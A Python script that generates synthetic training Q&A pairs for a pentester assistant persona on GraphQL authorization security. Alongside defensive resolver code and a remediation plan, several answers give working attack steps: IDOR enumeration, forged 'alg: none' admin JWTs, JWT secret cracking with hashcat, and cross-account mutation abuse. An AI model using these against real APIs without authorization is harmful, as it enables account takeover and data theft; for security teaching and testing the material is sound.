"""
GraphQL Security Knowledge Base
Covers GraphQL authentication/authorization flaws, testing techniques, and remediation.
Focuses on IDOR/BOLA vulnerabilities, JWT security, field-level authorization.
Outputs: data/raw_graphql_security_kb.json
"""
import json
from pathlib import Path

OUTPUT_FILE = Path(__file__).parent.parent / "data" / "raw_graphql_security_kb.json"

HANCOCK_SYSTEM = (
    "You are Hancock, an expert penetration tester and security researcher built by CyberViser. "
    "You operate strictly within authorized scope and legal boundaries on systems you have explicit "
    "written permission to test. You help security professionals understand GraphQL security, "
    "identify authentication/authorization vulnerabilities, and perform authorized security testing. "
    "You always recommend responsible disclosure and remediation."
)

KB = [
    # ─── GraphQL Authentication Basics ──────────────────────────────────────
    {
        "category": "graphql_auth",
        "user": "What are the most common authentication vulnerabilities in GraphQL APIs?",
        "assistant": (
            "**Top GraphQL Authentication/Authorization Vulnerabilities:**\n\n"
            "**1. Missing Object-Level Authorization (BOLA/IDOR):**\n"
            "The API protects the root query but forgets field-level checks. Users can access "
            "other users' data by changing IDs.\n\n"
            "**2. Missing Field-Level Authorization:**\n"
            "Sensitive fields (email, phone, SSN) lack authorization checks, even if the object "
            "is accessible.\n\n"
            "**3. JWT Algorithm Confusion:**\n"
            "Server accepts 'alg: none' or weak algorithms (HS256 with public key).\n\n"
            "**4. Insufficient Rate Limiting:**\n"
            "No limits on expensive queries or authentication mutations, enabling brute-force.\n\n"
            "**5. Information Disclosure via Introspection:**\n"
            "Introspection enabled in production exposes full schema to attackers.\n\n"
            "**6. Mutation Authorization Bypass:**\n"
            "Mutations (create, update, delete) lack ownership validation.\n\n"
            "**Best practice:** Implement @auth directives, field-level resolvers with context "
            "checks, disable introspection in production, and use persisted queries."
        ),
    },
    {
        "category": "graphql_auth",
        "user": "How do I test for IDOR vulnerabilities in a GraphQL API?",
        "assistant": (
            "**Testing for IDOR/BOLA in GraphQL:**\n\n"
            "**1. Identify Object Access Queries:**\n"
            "Look for queries that take IDs as parameters:\n"
            "```graphql\n"
            "query {\n"
            "  user(id: \"123\") { id email phone }\n"
            "  order(orderId: \"456\") { total items }\n"
            "}\n"
            "```\n\n"
            "**2. Test Cross-Account Access:**\n"
            "```bash\n"
            "# Authenticate as User A, get your ID\n"
            "curl -X POST https://target.com/graphql \\\n"
            "  -H \"Authorization: Bearer <valid-token-user-a>\" \\\n"
            "  -H \"Content-Type: application/json\" \\\n"
            "  -d '{\"query\":\"{ viewer { id email } }\"}'\n\n"
            "# Try accessing User B's data by changing the ID\n"
            "curl -X POST https://target.com/graphql \\\n"
            "  -H \"Authorization: Bearer <valid-token-user-a>\" \\\n"
            "  -H \"Content-Type: application/json\" \\\n"
            "  -d '{\"query\":\"{ user(id: \\\"user_b_id\\\") { email phone address } }\"}'\n"
            "```\n\n"
            "**3. Use Aliases to Test Multiple IDs:**\n"
            "```graphql\n"
            "query {\n"
            "  user1: user(id: \"1\") { email }\n"
            "  user2: user(id: \"2\") { email }\n"
            "  user999: user(id: \"999999\") { email }\n"
            "}\n"
            "```\n\n"
            "**4. Test with Fragments:**\n"
            "```graphql\n"
            "fragment UserData on User { id email phone }\n"
            "query {\n"
            "  u1: user(id: \"1\") { ...UserData }\n"
            "  u2: user(id: \"999\") { ...UserData }\n"
            "}\n"
            "```\n\n"
            "**Signs of IDOR:**\n"
            "- Returns data for IDs you don't own\n"
            "- Sequential IDs (1, 2, 3) enable enumeration\n"
            "- No error messages like 'Forbidden' or 'Access Denied'\n\n"
            "**Severity: HIGH** — Can lead to full account takeover and data exfiltration."
        ),
    },
    {
        "category": "graphql_auth",
        "user": "How do I test for JWT vulnerabilities in GraphQL APIs?",
        "assistant": (
            "**JWT Security Testing for GraphQL:**\n\n"
            "**1. Algorithm Confusion Attack (alg: none):**\n"
            "```bash\n"
            "# Decode existing token\n"
            "echo 'eyJhbGc...' | base64 -d\n\n"
            "# Create token with alg: none\n"
            "HEADER='{\"alg\":\"none\",\"typ\":\"JWT\"}'\n"
            "PAYLOAD='{\"sub\":\"admin\",\"role\":\"admin\"}'\n"
            "B64_HEADER=$(echo -n \"$HEADER\" | base64 -w0 | tr '+/' '-_' | tr -d '=')\n"
            "B64_PAYLOAD=$(echo -n \"$PAYLOAD\" | base64 -w0 | tr '+/' '-_' | tr -d '=')\n"
            "TOKEN=\"$B64_HEADER.$B64_PAYLOAD.\"\n\n"
            "# Test with modified token\n"
            "curl -X POST https://target.com/graphql \\\n"
            "  -H \"Authorization: Bearer $TOKEN\" \\\n"
            "  -d '{\"query\":\"{ viewer { role } }\"}'\n"
            "```\n\n"
            "**2. Weak Secret Brute-Force:**\n"
            "```bash\n"
            "# Use jwt-tool or hashcat\n"
            "python3 jwt_tool.py <token> -C -d /usr/share/wordlists/rockyou.txt\n"
            "hashcat -m 16500 jwt.txt rockyou.txt\n"
            "```\n\n"
            "**3. Key Confusion (RS256 to HS256):**\n"
            "If server uses RS256 (public key verification), try re-signing with HS256 using "
            "the public key as the HMAC secret.\n\n"
            "**4. Token Expiry & Refresh:**\n"
            "```bash\n"
            "# Test with expired token\n"
            "curl -X POST ... -H \"Authorization: Bearer <expired-token>\"\n\n"
            "# Check if refresh tokens are properly validated\n"
            "```\n\n"
            "**5. Token in URL (GET requests):**\n"
            "```bash\n"
            "# Check if GraphQL accepts GET with token in query string\n"
            "curl \"https://target.com/graphql?query={viewer{email}}&token=<token>\"\n"
            "```\n\n"
            "**Protected API Signs:**\n"
            "- Returns 'Invalid signature' for tampered tokens\n"
            "- Rejects 'alg: none' tokens\n"
            "- Enforces POST-only (prevents token logging in proxies)\n"
            "- Uses strong, rotated secrets\n"
            "- Implements proper token expiry (< 15 min access, longer refresh)"
        ),
    },
    {
        "category": "graphql_auth",
        "user": "What are the best practices for securing GraphQL field-level authorization?",
        "assistant": (
            "**Field-Level Authorization Best Practices:**\n\n"
            "**1. Use Authorization Directives:**\n"
            "```graphql\n"
            "directive @auth(requires: [Role!]!) on FIELD_DEFINITION\n\n"
            "type User {\n"
            "  id: ID!\n"
            "  email: String! @auth(requires: [OWNER, ADMIN])\n"
            "  phone: String! @auth(requires: [OWNER, ADMIN])\n"
            "  publicName: String!\n"
            "}\n\n"
            "type Query {\n"
            "  user(id: ID!): User @auth(requires: [AUTHENTICATED])\n"
            "  users: [User!]! @auth(requires: [ADMIN])\n"
            "}\n"
            "```\n\n"
            "**2. Implement Context-Aware Resolvers:**\n"
            "```typescript\n"
            "// lib/auth.ts\n"
            "export const isOwner = (context: Context, userId: string): boolean => {\n"
            "  return context.user?.id === userId;\n"
            "};\n\n"
            "export const hasRole = (context: Context, role: string): boolean => {\n"
            "  return context.user?.roles?.includes(role);\n"
            "};\n\n"
            "// resolvers/user.ts\n"
            "const resolvers = {\n"
            "  Query: {\n"
            "    user: async (parent, { id }, context) => {\n"
            "      if (!context.user) {\n"
            "        throw new AuthenticationError('Not authenticated');\n"
            "      }\n"
            "      const user = await db.users.findOne({ id });\n"
            "      if (!isOwner(context, id) && !hasRole(context, 'ADMIN')) {\n"
            "        throw new ForbiddenError('Access denied');\n"
            "      }\n"
            "      return user;\n"
            "    }\n"
            "  },\n"
            "  User: {\n"
            "    email: (parent, args, context) => {\n"
            "      if (!isOwner(context, parent.id) && !hasRole(context, 'ADMIN')) {\n"
            "        return null; // or throw ForbiddenError\n"
            "      }\n"
            "      return parent.email;\n"
            "    }\n"
            "  }\n"
            "};\n"
            "```\n\n"
            "**3. Replace Sequential IDs with Opaque Cursors:**\n"
            "```typescript\n"
            "// Use UUIDs or encrypted cursors instead of 1, 2, 3...\n"
            "id: string; // 'usr_2a8f9c3b7e1d' instead of '123'\n"
            "```\n\n"
            "**4. Implement Depth Limiting:**\n"
            "```typescript\n"
            "import depthLimit from 'graphql-depth-limit';\n"
            "const server = new ApolloServer({\n"
            "  validationRules: [depthLimit(5)]\n"
            "});\n"
            "```\n\n"
            "**5. Enable Persisted Queries:**\n"
            "Only allow pre-approved query hashes in production.\n\n"
            "**6. Log Cross-Account Access Attempts:**\n"
            "```typescript\n"
            "if (!isOwner(context, userId)) {\n"
            "  logger.warn('IDOR attempt', { \n"
            "    actor: context.user.id, \n"
            "    target: userId, \n"
            "    ip: context.ip \n"
            "  });\n"
            "}\n"
            "```\n\n"
            "**7. Disable Introspection in Production:**\n"
            "```typescript\n"
            "const server = new ApolloServer({\n"
            "  introspection: process.env.NODE_ENV !== 'production'\n"
            "});\n"
            "```"
        ),
    },
    {
        "category": "graphql_auth",
        "user": "How do I test GraphQL mutations for authorization bypass?",
        "assistant": (
            "**Testing Mutation Authorization:**\n\n"
            "**1. Identify Privileged Mutations:**\n"
            "```graphql\n"
            "mutation {\n"
            "  createUser(input: { email: \"admin@evil.com\", role: \"ADMIN\" })\n"
            "  updateUser(id: \"other_user_id\", input: { email: \"pwned@evil.com\" })\n"
            "  deleteUser(id: \"victim_id\")\n"
            "}\n"
            "```\n\n"
            "**2. Test Cross-Account Mutation:**\n"
            "```bash\n"
            "# Authenticate as User A\n"
            "curl -X POST https://target.com/graphql \\\n"
            "  -H \"Authorization: Bearer <user-a-token>\" \\\n"
            "  -d '{\"query\":\"mutation { updateUser(id: \\\"user_b_id\\\", input: { email: \\\"attacker@evil.com\\\" }) { id email } }\"}'\n"
            "```\n\n"
            "**3. Test Role Escalation:**\n"
            "```graphql\n"
            "mutation {\n"
            "  updateProfile(input: { role: \"ADMIN\" })\n"
            "}\n"
            "```\n\n"
            "**4. Test Mass Assignment:**\n"
            "```graphql\n"
            "mutation {\n"
            "  updateProfile(input: {\n"
            "    name: \"John\",\n"
            "    isAdmin: true,  # Should be rejected\n"
            "    credits: 99999  # Should be rejected\n"
            "  })\n"
            "}\n"
            "```\n\n"
            "**5. Test Batch Mutations:**\n"
            "```graphql\n"
            "mutation {\n"
            "  m1: updateUser(id: \"1\", input: { blocked: true })\n"
            "  m2: updateUser(id: \"2\", input: { blocked: true })\n"
            "  m3: deleteUser(id: \"3\")\n"
            "}\n"
            "```\n\n"
            "**Expected Secure Behavior:**\n"
            "- Returns 'Forbidden' or 'Access Denied'\n"
            "- Validates ownership: context.user.id === targetUserId\n"
            "- Strips privileged fields (role, isAdmin, credits)\n"
            "- Logs unauthorized attempts\n"
            "- Rate-limits mutation attempts (e.g., 10/min per user)"
        ),
    },
    {
        "category": "graphql_auth",
        "user": "Show me a complete example of secure GraphQL authorization implementation",
        "assistant": (
            "**Complete Secure GraphQL Authorization (TypeScript + Apollo):**\n\n"
            "```typescript\n"
            "// lib/auth.ts\n"
            "import { AuthenticationError, ForbiddenError } from 'apollo-server';\n\n"
            "export interface Context {\n"
            "  user: { id: string; roles: string[] } | null;\n"
            "  ip: string;\n"
            "}\n\n"
            "export const requireAuth = (context: Context) => {\n"
            "  if (!context.user) {\n"
            "    throw new AuthenticationError('Authentication required');\n"
            "  }\n"
            "};\n\n"
            "export const isOwner = (context: Context, resourceUserId: string): boolean => {\n"
            "  return context.user?.id === resourceUserId;\n"
            "};\n\n"
            "export const hasRole = (context: Context, ...roles: string[]): boolean => {\n"
            "  return roles.some(role => context.user?.roles?.includes(role));\n"
            "};\n\n"
            "export const requireOwnerOrAdmin = (context: Context, resourceUserId: string) => {\n"
            "  requireAuth(context);\n"
            "  if (!isOwner(context, resourceUserId) && !hasRole(context, 'ADMIN')) {\n"
            "    throw new ForbiddenError('Access denied: not owner or admin');\n"
            "  }\n"
            "};\n\n"
            "// schema.graphql\n"
            "type User {\n"
            "  id: ID!\n"
            "  email: String!\n"
            "  phone: String\n"
            "  publicName: String!\n"
            "}\n\n"
            "type Query {\n"
            "  viewer: User\n"
            "  user(id: ID!): User\n"
            "}\n\n"
            "type Mutation {\n"
            "  updateUser(id: ID!, input: UserInput!): User\n"
            "}\n\n"
            "input UserInput {\n"
            "  email: String\n"
            "  phone: String\n"
            "  publicName: String\n"
            "}\n\n"
            "// resolvers/user.ts\n"
            "import { requireAuth, requireOwnerOrAdmin, isOwner, hasRole } from '../lib/auth';\n\n"
            "const resolvers = {\n"
            "  Query: {\n"
            "    viewer: (parent, args, context) => {\n"
            "      requireAuth(context);\n"
            "      return db.users.findOne({ id: context.user.id });\n"
            "    },\n"
            "    user: async (parent, { id }, context) => {\n"
            "      requireAuth(context);\n"
            "      const user = await db.users.findOne({ id });\n"
            "      if (!user) return null;\n"
            "      // Allow access only to own data or if admin\n"
            "      requireOwnerOrAdmin(context, id);\n"
            "      return user;\n"
            "    }\n"
            "  },\n"
            "  User: {\n"
            "    // Field-level authorization for sensitive fields\n"
            "    email: (parent, args, context) => {\n"
            "      if (!isOwner(context, parent.id) && !hasRole(context, 'ADMIN')) {\n"
            "        return null; // Hide email from non-owners\n"
            "      }\n"
            "      return parent.email;\n"
            "    },\n"
            "    phone: (parent, args, context) => {\n"
            "      if (!isOwner(context, parent.id) && !hasRole(context, 'ADMIN')) {\n"
            "        return null; // Hide phone from non-owners\n"
            "      }\n"
            "      return parent.phone;\n"
            "    },\n"
            "    publicName: (parent) => parent.publicName // Always visible\n"
            "  },\n"
            "  Mutation: {\n"
            "    updateUser: async (parent, { id, input }, context) => {\n"
            "      requireOwnerOrAdmin(context, id);\n"
            "      // Strip any privileged fields from input (mass assignment protection)\n"
            "      const { email, phone, publicName } = input;\n"
            "      const safeInput = { email, phone, publicName };\n"
            "      const updated = await db.users.update({ id }, safeInput);\n"
            "      return updated;\n"
            "    }\n"
            "  }\n"
            "};\n\n"
            "// server.ts\n"
            "import { ApolloServer } from 'apollo-server';\n"
            "import depthLimit from 'graphql-depth-limit';\n"
            "import jwt from 'jsonwebtoken';\n\n"
            "const server = new ApolloServer({\n"
            "  typeDefs,\n"
            "  resolvers,\n"
            "  context: ({ req }) => {\n"
            "    const token = req.headers.authorization?.replace('Bearer ', '');\n"
            "    let user = null;\n"
            "    if (token) {\n"
            "      try {\n"
            "        user = jwt.verify(token, process.env.JWT_SECRET);\n"
            "      } catch (err) {\n"
            "        // Invalid token - proceed as unauthenticated\n"
            "      }\n"
            "    }\n"
            "    return { user, ip: req.ip };\n"
            "  },\n"
            "  introspection: process.env.NODE_ENV !== 'production',\n"
            "  validationRules: [depthLimit(5)], // Prevent deep query DoS\n"
            "});\n"
            "```\n\n"
            "**Key Security Features:**\n"
            "1. ✅ Authentication check at resolver level\n"
            "2. ✅ Ownership validation (user can only access their own data)\n"
            "3. ✅ Role-based access control (ADMIN override)\n"
            "4. ✅ Field-level authorization (hide sensitive fields)\n"
            "5. ✅ Mass assignment protection (strip privileged fields)\n"
            "6. ✅ Depth limiting (prevent DoS)\n"
            "7. ✅ Introspection disabled in production\n"
            "8. ✅ Proper error messages (no info leak)\n"
            "9. ✅ JWT validation with proper secret management"
        ),
    },
    {
        "category": "graphql_auth",
        "user": "How do I test GraphQL rate limiting and prevent brute-force attacks?",
        "assistant": (
            "**Testing GraphQL Rate Limiting:**\n\n"
            "**1. Test Login Mutation Rate Limit:**\n"
            "```bash\n"
            "# Parallel requests to test concurrent limit\n"
            "for i in {1..50}; do\n"
            "  curl -s -X POST https://target.com/graphql \\\n"
            "    -H \"Content-Type: application/json\" \\\n"
            "    -d '{\"query\":\"mutation { login(email: \\\"test'$i'@evil.com\\\", password: \\\"wrong\\\") { token } }\"}' &\n"
            "done\n"
            "wait\n"
            "```\n\n"
            "**Expected:** 429 Too Many Requests after ~5-10 attempts.\n\n"
            "**2. Test Query Complexity:**\n"
            "```graphql\n"
            "# Deep nested query to test complexity limits\n"
            "query {\n"
            "  user(id: \"1\") {\n"
            "    friends {\n"
            "      friends {\n"
            "        friends {\n"
            "          friends {\n"
            "            friends { id }\n"
            "          }\n"
            "        }\n"
            "      }\n"
            "    }\n"
            "  }\n"
            "}\n"
            "```\n\n"
            "**3. Test Batch Query Limits:**\n"
            "```graphql\n"
            "query {\n"
            "  u1: user(id: \"1\") { email }\n"
            "  u2: user(id: \"2\") { email }\n"
            "  # ... repeat 100 times\n"
            "  u100: user(id: \"100\") { email }\n"
            "}\n"
            "```\n\n"
            "**Implementing Rate Limiting (GraphQL Shield):**\n"
            "```typescript\n"
            "import { shield, rule } from 'graphql-shield';\n"
            "import rateLimit from 'graphql-rate-limit';\n\n"
            "const rateLimiter = rateLimit({\n"
            "  identifyContext: (ctx) => ctx.user?.id || ctx.ip\n"
            "});\n\n"
            "const loginRateLimit = rateLimiter({ max: 5, window: '15m' });\n"
            "const mutationRateLimit = rateLimiter({ max: 50, window: '1m' });\n\n"
            "const permissions = shield({\n"
            "  Mutation: {\n"
            "    login: loginRateLimit,\n"
            "    updateUser: mutationRateLimit\n"
            "  }\n"
            "});\n"
            "```\n\n"
            "**Cost Analysis (Apollo):**\n"
            "```typescript\n"
            "import { createComplexityLimitRule } from 'graphql-validation-complexity';\n\n"
            "const server = new ApolloServer({\n"
            "  validationRules: [\n"
            "    createComplexityLimitRule(1000, {\n"
            "      scalarCost: 1,\n"
            "      objectCost: 5,\n"
            "      listFactor: 10\n"
            "    })\n"
            "  ]\n"
            "});\n"
            "```\n\n"
            "**Monitoring & Alerting:**\n"
            "```typescript\n"
            "// Log failed auth attempts\n"
            "if (!user) {\n"
            "  logger.warn('Failed login', { \n"
            "    email, \n"
            "    ip: context.ip, \n"
            "    timestamp: Date.now() \n"
            "  });\n"
            "  // Alert if > 10 failures in 1 min from same IP\n"
            "}\n"
            "```"
        ),
    },
    {
        "category": "graphql_auth",
        "user": "What tools should I use for GraphQL security testing?",
        "assistant": (
            "**Essential GraphQL Security Testing Tools:**\n\n"
            "**1. InQL (Introspection Query Scanner):**\n"
            "```bash\n"
            "# Burp Suite extension for GraphQL introspection\n"
            "# Download from: https://github.com/doyensec/inql\n"
            "```\n\n"
            "**2. GraphQL Cop (Security Auditor):**\n"
            "```bash\n"
            "pip install graphql-cop\n"
            "graphql-cop -t https://target.com/graphql\n"
            "```\n\n"
            "**3. BatchQL (IDOR Testing):**\n"
            "```bash\n"
            "git clone https://github.com/assetnote/batchql\n"
            "python3 batchql.py -u https://target.com/graphql -q user\n"
            "```\n\n"
            "**4. GraphQLmap (Exploitation Framework):**\n"
            "```bash\n"
            "git clone https://github.com/swisskyrepo/GraphQLmap\n"
            "python graphqlmap.py -u https://target.com/graphql\n"
            "# Commands: dump_new, dump_old, nosqli, postgresqli\n"
            "```\n\n"
            "**5. Clairvoyance (Schema Reconstruction):**\n"
            "```bash\n"
            "pip install clairvoyance\n"
            "clairvoyance -u https://target.com/graphql -o schema.json\n"
            "```\n\n"
            "**6. GraphQL Voyager (Schema Visualization):**\n"
            "```bash\n"
            "# Online tool: https://graphql-voyager.netlify.app\n"
            "# Paste introspection result to visualize relationships\n"
            "```\n\n"
            "**7. Altair GraphQL Client:**\n"
            "```bash\n"
            "# Desktop app with built-in introspection, headers, auth\n"
            "# Download: https://altairgraphql.dev\n"
            "```\n\n"
            "**8. Manual Testing with cURL:**\n"
            "```bash\n"
            "# Introspection query\n"
            "curl -X POST https://target.com/graphql \\\n"
            "  -H \"Content-Type: application/json\" \\\n"
            "  -d '{\"query\":\"{ __schema { types { name } } }\"}'\n\n"
            "# Test query\n"
            "curl -X POST https://target.com/graphql \\\n"
            "  -H \"Authorization: Bearer <token>\" \\\n"
            "  -H \"Content-Type: application/json\" \\\n"
            "  -d @query.json\n"
            "```\n\n"
            "**Automated Scanning Workflow:**\n"
            "1. Run GraphQL Cop for quick wins\n"
            "2. Use InQL/Clairvoyance to extract schema\n"
            "3. Identify sensitive queries/mutations\n"
            "4. Test IDOR with BatchQL\n"
            "5. Test auth bypass with custom cURL scripts\n"
            "6. Verify findings manually"
        ),
    },
    {
        "category": "graphql_auth",
        "user": "Generate a remediation plan for GraphQL IDOR vulnerabilities found in production",
        "assistant": (
            "**GraphQL IDOR Remediation Plan (Production-Safe):**\n\n"
            "**Phase 1: Immediate Containment (Day 0-1):**\n"
            "```typescript\n"
            "// 1. Add emergency middleware to log suspicious access\n"
            "app.use('/graphql', (req, res, next) => {\n"
            "  const body = req.body?.query || '';\n"
            "  if (body.includes('user(id:') || body.includes('otherUser')) {\n"
            "    logger.alert('POTENTIAL_IDOR', {\n"
            "      user: req.user?.id,\n"
            "      ip: req.ip,\n"
            "      query: body,\n"
            "      timestamp: Date.now()\n"
            "    });\n"
            "  }\n"
            "  next();\n"
            "});\n\n"
            "// 2. Rate-limit vulnerable queries\n"
            "const limiter = rateLimit({ windowMs: 60000, max: 5 });\n"
            "app.use('/graphql', limiter);\n"
            "```\n\n"
            "**Phase 2: Quick Fix (Day 1-3):**\n"
            "```typescript\n"
            "// Add ownership checks to vulnerable resolvers\n"
            "const resolvers = {\n"
            "  Query: {\n"
            "    user: async (parent, { id }, context) => {\n"
            "      // IMMEDIATE FIX\n"
            "      if (!context.user) {\n"
            "        throw new AuthenticationError('Auth required');\n"
            "      }\n"
            "      if (context.user.id !== id && !context.user.roles.includes('ADMIN')) {\n"
            "        throw new ForbiddenError('Access denied');\n"
            "      }\n"
            "      return db.users.findOne({ id });\n"
            "    }\n"
            "  },\n"
            "  User: {\n"
            "    email: (parent, args, context) => {\n"
            "      if (context.user?.id !== parent.id && !context.user?.roles.includes('ADMIN')) {\n"
            "        return null; // Hide sensitive field\n"
            "      }\n"
            "      return parent.email;\n"
            "    }\n"
            "  }\n"
            "};\n"
            "```\n\n"
            "**Phase 3: Structural Fix (Week 1-2):**\n"
            "```typescript\n"
            "// 1. Replace sequential IDs with UUIDs\n"
            "ALTER TABLE users ADD COLUMN uuid VARCHAR(36) DEFAULT (UUID());\n"
            "UPDATE users SET uuid = UUID();\n"
            "// Migrate application code to use uuid instead of id\n\n"
            "// 2. Implement authorization middleware\n"
            "import { shield, rule } from 'graphql-shield';\n\n"
            "const isAuthenticated = rule()(async (parent, args, ctx) => {\n"
            "  return ctx.user !== null;\n"
            "});\n\n"
            "const isOwnerOrAdmin = rule()(async (parent, args, ctx) => {\n"
            "  return ctx.user.id === args.id || ctx.user.roles.includes('ADMIN');\n"
            "});\n\n"
            "const permissions = shield({\n"
            "  Query: {\n"
            "    user: isOwnerOrAdmin\n"
            "  }\n"
            "});\n"
            "```\n\n"
            "**Phase 4: Long-Term Security (Week 2-4):**\n"
            "```typescript\n"
            "// 1. Enable persisted queries only\n"
            "const server = new ApolloServer({\n"
            "  persistedQueries: {\n"
            "    cache: new RedisCache({ host: 'redis' }),\n"
            "  },\n"
            "  allowBatchedHttpRequests: false, // Prevent bulk IDOR\n"
            "});\n\n"
            "// 2. Implement field-level encryption for sensitive data\n"
            "email: async (parent, args, context) => {\n"
            "  const decrypted = await decrypt(parent.encrypted_email);\n"
            "  return isOwnerOrAdmin(context, parent.id) ? decrypted : null;\n"
            "}\n\n"
            "// 3. Add monitoring & alerting\n"
            "const monitor = new ApolloServerPluginUsageReporting({\n"
            "  sendVariableValues: { none: true },\n"
            "  sendHeaders: { none: true },\n"
            "});\n"
            "```\n\n"
            "**Phase 5: Verification (Ongoing):**\n"
            "```bash\n"
            "# 1. Security regression tests\n"
            "npm run test:security\n\n"
            "# 2. External pentest\n"
            "# 3. Bug bounty program\n"
            "# 4. Quarterly security audits\n"
            "```\n\n"
            "**Communication Template:**\n"
            "```markdown\n"
            "## Security Advisory: IDOR Vulnerability Patched\n"
            "**Severity:** HIGH\n"
            "**CVE:** CVE-2026-XXXXX\n"
            "**Affected:** GraphQL user query endpoint\n"
            "**Impact:** Unauthorized access to user email/phone fields\n"
            "**Fix:** Field-level authorization + UUID migration\n"
            "**Timeline:** Fixed in v2.1.3 (2026-03-02)\n"
            "**Action Required:** Update to v2.1.3+\n"
            "```\n\n"
            "**Jira Ticket Template:**\n"
            "```\n"
            "Title: [SECURITY] Implement GraphQL Field-Level Authorization\n"
            "Priority: P0 (Critical)\n"
            "Epic: Security Hardening Q1 2026\n"
            "Assignee: Security Team Lead\n"
            "Story Points: 8\n\n"
            "Acceptance Criteria:\n"
            "- [ ] Add ownership checks to all user queries\n"
            "- [ ] Implement @auth directives\n"
            "- [ ] Replace numeric IDs with UUIDs\n"
            "- [ ] Add security regression tests\n"
            "- [ ] Enable CloudWatch alerting on cross-user access\n"
            "- [ ] Disable introspection in production\n"
            "- [ ] Document auth patterns for future resolvers\n"
            "```"
        ),
    },
]


def collect() -> int:
    """Generate GraphQL security knowledge base and save to JSON."""
    OUTPUT_FILE.parent.mkdir(parents=True, exist_ok=True)
    
    qa_pairs = []
    for entry in KB:
        qa_pairs.append({
            "category": entry["category"],
            "user": entry["user"],
            "assistant": entry["assistant"],
        })
    
    output = {
        "source": "graphql_security_kb",
        "system": HANCOCK_SYSTEM,
        "pairs": qa_pairs,
        "count": len(qa_pairs),
    }
    
    OUTPUT_FILE.write_text(json.dumps(output, indent=2, ensure_ascii=False))
    print(f"✅ Generated {len(qa_pairs)} GraphQL security Q&A pairs → {OUTPUT_FILE}")
    return len(qa_pairs)


if __name__ == "__main__":
    collect()
